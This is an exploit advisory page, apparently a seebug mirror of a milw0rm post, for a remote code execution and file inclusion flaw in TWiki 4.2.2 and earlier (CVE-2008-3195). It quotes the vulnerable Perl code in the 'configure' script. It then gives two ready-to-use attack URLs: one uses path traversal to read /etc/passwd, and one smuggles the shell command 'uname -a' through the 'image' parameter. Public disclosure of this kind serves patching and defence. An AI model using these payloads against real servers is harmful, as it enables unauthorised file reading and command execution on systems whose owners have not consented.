TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability

2014-07-0100:00:00

Root

www.seebug.org

0.124 Low

EPSS

Percentile

95.5%

JSON

No description provided by source.


                                                #-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------TWiki Remote Code Execution &#60;= 4.2.2--------------------#

# ----------developers site: http://www.twiki.org-------------------#
# ----------CVE Id(s)      : CVE-2008-3195--------------------------#

# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights

The &#34;configure&#34; file in TWiki&#39;s bin folder is vulnerable to code execution and local file inclusion.

According to TWiki&#39;s documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;)

Vulnerable code:

if( $action eq &#39;image&#39; ) {
    # SMELL: this call is correct, but causes a perl error

    # on some versions of CGI.pm
    # print $query-&#62;header(-type =&#62; $query-&#62;param(&#39;type&#39;));
    # So use this instead:
    print &#39;Content-type: &#39;.$query-&#62;param(&#39;type&#39;).&#34;\n\n&#34;;

    if( open(F, &#39;logos/&#39;.$query-&#62;param(&#39;image&#39; ))) {
        local $/ = undef;
        print &#60;F&#62;;
        close(F);
    }

http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain

http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain

# milw0rm.com [2008-09-21]

0.124 Low

EPSS

Percentile

95.5%

JSON

Related for SSV:65731